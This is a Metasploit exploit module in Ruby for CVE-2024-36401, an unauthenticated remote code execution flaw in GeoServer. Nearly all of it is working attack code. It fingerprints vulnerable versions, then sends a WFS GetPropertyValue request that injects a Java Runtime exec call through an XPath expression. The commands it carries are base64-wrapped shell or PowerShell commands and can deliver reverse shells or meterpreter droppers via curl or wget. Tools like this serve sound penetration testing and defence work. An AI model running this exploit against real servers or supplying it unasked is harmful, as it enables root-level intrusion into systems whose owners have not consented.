Geoserver Unauthenticated Remote Code Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Geoserver unauthenticated Remote Code Execution',  
'Description' => %q{  
GeoServer is an open-source software server written in Java that provides  
the ability to view, edit, and share geospatial data.  
It is designed to be a flexible, efficient solution for distributing geospatial data  
from a variety of sources such as Geographic Information System (GIS) databases,  
web-based data, and personal datasets.  
In the GeoServer versions < 2.23.6, >= 2.24.0, < 2.24.4 and >= 2.25.0, < 2.25.1,  
multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users  
through specially crafted input against a default GeoServer installation due to unsafely  
evaluating property names as XPath expressions.  
An attacker can abuse this by sending a POST request with a malicious xpath expression  
to execute arbitrary commands as root on the system.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor  
'jheysel-r7', # MSF module Windows support  
'Steve Ikeoka' # Discovery  
],  
'References' => [  
['CVE', '2024-36401'],  
['URL', 'https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv'],  
['URL', 'https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401'],  
['URL', 'https://attackerkb.com/topics/W6IDY2mmp9/cve-2024-36401']  
],  
'DisclosureDate' => '2024-07-01',  
'Platform' => ['unix', 'linux'],  
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE],  
'Privileged' => true,  
'Targets' => [  
[  
'Unix Command',  
{  
'Platform' => ['unix', 'linux'],  
'Arch' => ARCH_CMD,  
'Type' => :unix_cmd  
# Tested with cmd/unix/reverse_bash  
}  
],  
[  
'Linux Dropper',  
{  
'Platform' => ['linux'],  
'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE],  
'Type' => :linux_dropper,  
'Linemax' => 16384,  
'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne']  
# Tested with linux/x64/meterpreter_reverse_tcp  
}  
],  
[  
'Windows Command',  
{  
'Platform' => ['Windows'],  
'Arch' => ARCH_CMD,  
'Type' => :win_cmd  
# Tested with cmd/windows/http/x64/meterpreter/reverse_tcp  
}  
],  
],  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'RPORT' => 8080,  
'SSL' => false  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]  
}  
)  
)  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The URI path of the OpenMediaVault web application', '/'])  
]  
)  
end  
  
def check_version  
print_status('Trying to detect if target is running a vulnerable version of GeoServer.')  
res = send_request_cgi!({  
'uri' => normalize_uri(target_uri.path, 'geoserver', 'web', 'wicket', 'bookmarkable', 'org.geoserver.web.AboutGeoServerPage'),  
'keep_cookies' => true,  
'method' => 'GET'  
})  
return nil unless res && res.code == 200 && res.body.include?('GeoServer Version')  
  
html = res.get_html_document  
unless html.blank?  
# html identifier for Geoserver version information: <span id="version">2.23.2</span>  
version = html.css('span[id="version"]')  
return Rex::Version.new(version[0].text) unless version[0].nil?  
end  
nil  
end  
  
def get_valid_featuretype  
allowed_feature_types = ['sf:archsites', 'sf:bugsites', 'sf:restricted', 'sf:roads', 'sf:streams', 'ne:boundary_lines', 'ne:coastlines', 'ne:countries', 'ne:disputed_areas', 'ne:populated_places']  
res = send_request_cgi!({  
'uri' => normalize_uri(target_uri.path, 'geoserver', 'wfs'),  
'method' => 'GET',  
'ctype' => 'application/xml',  
'keep_cookies' => true,  
'vars_get' => {  
'request' => 'ListStoredQueries',  
'service' => 'wfs'  
}  
})  
return nil unless res && res.code == 200 && res.body.include?('ListStoredQueriesResponse')  
  
xml = res.get_xml_document  
unless xml.blank?  
xml.remove_namespaces!  
# get all the FeatureTypes and store them in an array of strings  
retrieved_feature_types = xml.xpath('//ReturnFeatureType')  
# shuffle the retrieved_feature_types array, and loop through the list of retrieved_feature_types from GeoServer  
# return the feature type if a match is found in the allowed_feature_types array  
retrieved_feature_types.to_a.shuffle.each do |feature_type|  
return feature_type.text if allowed_feature_types.include?(feature_type.text)  
end  
end  
nil  
end  
  
def create_payload(cmd)  
# get a valid feature type and fail back to a default if not successful  
feature_type = get_valid_featuretype  
feature_type = 'sf:archsites' if feature_type.nil?  
  
case target['Type']  
when :unix_cmd || :linux_dropper  
# create customised b64 encoded payload  
# 'Encoder' => 'cmd/base64' does not work in this particular use case  
cmd_b64 = Base64.strict_encode64(cmd)  
cmd = "sh -c echo${IFS}#{cmd_b64}|base64${IFS}-d|sh"  
when :win_cmd  
enc_cmd = Base64.strict_encode64("cmd /C --% #{payload.encoded}".encode('UTF-16LE'))  
cmd = "powershell.exe -e #{enc_cmd}"  
end  
  
return <<~EOS  
<wfs:GetPropertyValue service='WFS' version='2.0.0'  
xmlns:topp='http://www.openplans.org/topp'  
xmlns:fes='http://www.opengis.net/fes/2.0'  
xmlns:wfs='http://www.opengis.net/wfs/2.0'>  
<wfs:Query typeNames="#{feature_type}"/>  
<wfs:valueReference>exec(java.lang.Runtime.getRuntime(), "#{cmd}")</wfs:valueReference>  
</wfs:GetPropertyValue>  
EOS  
end  
  
def execute_command(cmd, _opts = {})  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, 'geoserver', 'wfs'),  
'method' => 'POST',  
'ctype' => 'application/xml',  
'keep_cookies' => true,  
'data' => create_payload(cmd)  
})  
fail_with(Failure::PayloadFailed, 'Payload execution failed.') unless res && res.code == 400 && res.body.include?('ClassCastException')  
end  
  
def check  
version_number = check_version  
return CheckCode::Unknown('Could not retrieve the version information.') if version_number.nil?  
return CheckCode::Appears("Version #{version_number}") if version_number.between?(Rex::Version.new('2.25.0'), Rex::Version.new('2.25.1')) || version_number.between?(Rex::Version.new('2.24.0'), Rex::Version.new('2.24.3')) || version_number < Rex::Version.new('2.23.6')  
  
CheckCode::Safe("Version #{version_number}")  
end  
  
def exploit  
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")  
  
case target['Type']  
when :unix_cmd, :win_cmd  
execute_command(payload.encoded)  
when :linux_dropper  
# don't check the response here since the server won't respond  
# if the payload is successfully executed.  
execute_cmdstager({ linemax: target.opts['Linemax'] })  
end  
end  
end  
`